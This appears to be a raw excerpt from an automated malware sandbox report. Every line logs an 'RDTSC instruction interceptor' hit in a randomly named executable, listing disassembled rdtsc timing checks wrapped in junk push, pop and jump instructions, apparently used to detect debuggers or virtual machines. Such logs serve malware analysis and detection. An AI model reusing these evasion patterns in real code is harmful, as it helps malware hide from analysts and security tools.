        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F738CC second address: F738D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F738D0 second address: F738E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8E4E1A521h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F81D51 second address: F81D86 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FB8E4E1E3C6h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 jns 00007FB8E4E1E3B8h 0x00000018 pushad 0x00000019 popad 0x0000001a pop eax 0x0000001b mov eax, dword ptr [esp+04h] 0x0000001f push ecx 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F81D86 second address: F81DA6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007FB8E4E1A51Dh 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 push esi 0x00000016 pop esi 0x00000017 pop edx 0x00000018 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F81E92 second address: F81EA8 instructions: 0x00000000 rdtsc 0x00000002 je 00007FB8E4E1E3B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jg 00007FB8E4E1E3B8h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F81EA8 second address: F81F06 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB8E4E1A51Dh 0x00000008 jmp 00007FB8E4E1A51Ah 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 je 00007FB8E4E1A535h 0x0000001a mov eax, dword ptr [eax] 0x0000001c push eax 0x0000001d push edx 0x0000001e push esi 0x0000001f jmp 00007FB8E4E1A522h 0x00000024 pop esi 0x00000025 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F81F06 second address: F81F0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F81F0C second address: F81F10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F81F10 second address: F81F25 instructions: 0x00000000 rdtsc 0x00000002 js 00007FB8E4E1E3B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F81F25 second address: F81F2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F81F2E second address: F81F34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F88034 second address: F88038 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F8820B second address: F88215 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FB8E4E1E3B6h 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F88215 second address: F8823A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007FB8E4E1A520h 0x0000000c pop eax 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 jl 00007FB8E4E1A516h 0x0000001a rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F8823A second address: F88278 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8E4E1E3BCh 0x00000007 jnl 00007FB8E4E1E3B6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007FB8E4E1E3C8h 0x00000014 jmp 00007FB8E4E1E3BDh 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F88811 second address: F8881B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FB8E4E1A516h 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F88AB5 second address: F88ABF instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB8E4E1E3BCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F8D217 second address: F8D229 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jbe 00007FB8E4E1A516h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F8D229 second address: F8D22D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F8D4F6 second address: F8D50B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8E4E1A521h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F8D50B second address: F8D511 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F8D511 second address: F8D516 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F8D516 second address: F8D51C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F8D51C second address: F8D525 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F8D525 second address: F8D529 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F8D529 second address: F8D52F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F8D9B9 second address: F8D9D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB8E4E1E3BBh 0x00000009 popad 0x0000000a pushad 0x0000000b jl 00007FB8E4E1E3B6h 0x00000011 jo 00007FB8E4E1E3B6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F0D7D1 second address: F0D7D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F0D7D6 second address: F0D7E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FB8E4E1E3BBh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F8E335 second address: F8E350 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jne 00007FB8E4E1A51Ch 0x0000000b jng 00007FB8E4E1A516h 0x00000011 push eax 0x00000012 push edx 0x00000013 jnl 00007FB8E4E1A516h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F8E350 second address: F8E354 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F920AC second address: F920E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FB8E4E1A516h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 push esi 0x00000011 pop esi 0x00000012 pop eax 0x00000013 popad 0x00000014 jnp 00007FB8E4E1A538h 0x0000001a pushad 0x0000001b jmp 00007FB8E4E1A524h 0x00000020 push eax 0x00000021 pop eax 0x00000022 popad 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F952CD second address: F952E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8E4E1E3BFh 0x00000007 pushad 0x00000008 jg 00007FB8E4E1E3B6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F9B550 second address: F9B560 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FB8E4E1A516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F9B560 second address: F9B564 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F9A386 second address: F9A3A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8E4E1A529h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F9A3A3 second address: F9A3AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ebx 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F9A3AE second address: F9A3C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB8E4E1A51Eh 0x00000009 pop edx 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F9A4C0 second address: F9A4F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB8E4E1E3C3h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB8E4E1E3C8h 0x00000011 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F9A4F2 second address: F9A4F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F9A4F6 second address: F9A506 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007FB8E4E1E3B6h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F9A863 second address: F9A867 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F9AA17 second address: F9AA2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007FB8E4E1E3BDh 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F9AA2C second address: F9AA3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FB8E4E1A516h 0x0000000a popad 0x0000000b popad 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F9AA3D second address: F9AA56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB8E4E1E3C5h 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F9AA56 second address: F9AA5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F99F3C second address: F99F49 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 ja 00007FB8E4E1E3B6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F99F49 second address: F99F55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F99F55 second address: F99F68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB8E4E1E3BFh 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F9AD00 second address: F9AD05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F9AE65 second address: F9AE79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB8E4E1E3C0h 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F9FA93 second address: F9FAA1 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FB8E4E1A518h 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F9FAA1 second address: F9FAA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F9FAA5 second address: F9FAB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jng 00007FB8E4E1A522h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F9FAB6 second address: F9FAC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FB8E4E1E3B6h 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F9FAC6 second address: F9FACA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F14269 second address: F1426D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F1426D second address: F14294 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB8E4E1A516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB8E4E1A529h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F14294 second address: F14298 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F4E9C1 second address: F4E9C7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F4EEDF second address: F4EF34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB8E4E1E3BFh 0x00000008 jmp 00007FB8E4E1E3C7h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [eax] 0x00000012 jmp 00007FB8E4E1E3C7h 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b pushad 0x0000001c jnp 00007FB8E4E1E3B8h 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F4EF34 second address: F4EF55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 pop eax 0x00000009 call 00007FB8E4E1A519h 0x0000000e pushad 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 je 00007FB8E4E1A51Ch 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F4EF55 second address: F4EFB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 push edx 0x00000008 jmp 00007FB8E4E1E3C8h 0x0000000d pop edx 0x0000000e pushad 0x0000000f jnc 00007FB8E4E1E3B6h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 popad 0x00000019 mov eax, dword ptr [esp+04h] 0x0000001d jmp 00007FB8E4E1E3C2h 0x00000022 mov eax, dword ptr [eax] 0x00000024 push esi 0x00000025 pushad 0x00000026 jmp 00007FB8E4E1E3BAh 0x0000002b push edx 0x0000002c pop edx 0x0000002d popad 0x0000002e pop esi 0x0000002f mov dword ptr [esp+04h], eax 0x00000033 pushad 0x00000034 push eax 0x00000035 push edx 0x00000036 push edx 0x00000037 pop edx 0x00000038 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F4F3D7 second address: F4F402 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 nop 0x00000006 mov dword ptr [ebp+122D3689h], edi 0x0000000c push 00000004h 0x0000000e sub dword ptr [ebp+122D30E4h], ebx 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 jmp 00007FB8E4E1A51Ch 0x0000001d jc 00007FB8E4E1A516h 0x00000023 popad 0x00000024 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F4F79E second address: F4F7A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F4F7A4 second address: F4F7BB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jnp 00007FB8E4E1A532h 0x0000000f push eax 0x00000010 push edx 0x00000011 jo 00007FB8E4E1A516h 0x00000017 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F4FAC1 second address: F4FAC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F4FAC5 second address: F4FAD2 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB8E4E1A516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F4FAD2 second address: F4FB01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FB8E4E1E3B6h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007FB8E4E1E3C0h 0x00000015 jmp 00007FB8E4E1E3BEh 0x0000001a popad 0x0000001b rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F4FBF8 second address: F4FBFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F4FBFE second address: F4FC22 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8E4E1E3BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jg 00007FB8E4E1E3C2h 0x00000012 jg 00007FB8E4E1E3BCh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F4FC22 second address: F4FC75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 nop 0x00000005 push 00000000h 0x00000007 push esi 0x00000008 call 00007FB8E4E1A518h 0x0000000d pop esi 0x0000000e mov dword ptr [esp+04h], esi 0x00000012 add dword ptr [esp+04h], 0000001Ch 0x0000001a inc esi 0x0000001b push esi 0x0000001c ret 0x0000001d pop esi 0x0000001e ret 0x0000001f mov dword ptr [ebp+12464A61h], ecx 0x00000025 lea eax, dword ptr [ebp+1247860Ch] 0x0000002b mov edi, dword ptr [ebp+122D2B2Bh] 0x00000031 jmp 00007FB8E4E1A523h 0x00000036 nop 0x00000037 push esi 0x00000038 pushad 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F4FC75 second address: F4FCCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FB8E4E1E3B6h 0x0000000a popad 0x0000000b pop esi 0x0000000c push eax 0x0000000d jng 00007FB8E4E1E3BEh 0x00000013 jo 00007FB8E4E1E3B8h 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b nop 0x0000001c push 00000000h 0x0000001e push eax 0x0000001f call 00007FB8E4E1E3B8h 0x00000024 pop eax 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 add dword ptr [esp+04h], 00000015h 0x00000031 inc eax 0x00000032 push eax 0x00000033 ret 0x00000034 pop eax 0x00000035 ret 0x00000036 mov ecx, dword ptr [ebp+122D28BBh] 0x0000003c lea eax, dword ptr [ebp+124785C8h] 0x00000042 mov di, 3FBBh 0x00000046 nop 0x00000047 push eax 0x00000048 push edx 0x00000049 pushad 0x0000004a jnl 00007FB8E4E1E3B6h 0x00000050 pushad 0x00000051 popad 0x00000052 popad 0x00000053 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F9EB93 second address: F9EBAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB8E4E1A523h 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F9EBAA second address: F9EBCA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8E4E1E3BEh 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jng 00007FB8E4E1E3C6h 0x00000011 push eax 0x00000012 push edx 0x00000013 push edi 0x00000014 pop edi 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F9EBCA second address: F9EBCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F9F042 second address: F9F048 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F9F2ED second address: F9F2F7 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FB8E4E1A516h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F9F2F7 second address: F9F310 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FB8E4E1E3BDh 0x0000000c push esi 0x0000000d pop esi 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F9F497 second address: F9F4BC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FB8E4E1A522h 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FB8E4E1A51Dh 0x00000010 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FA1B3D second address: FA1B41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
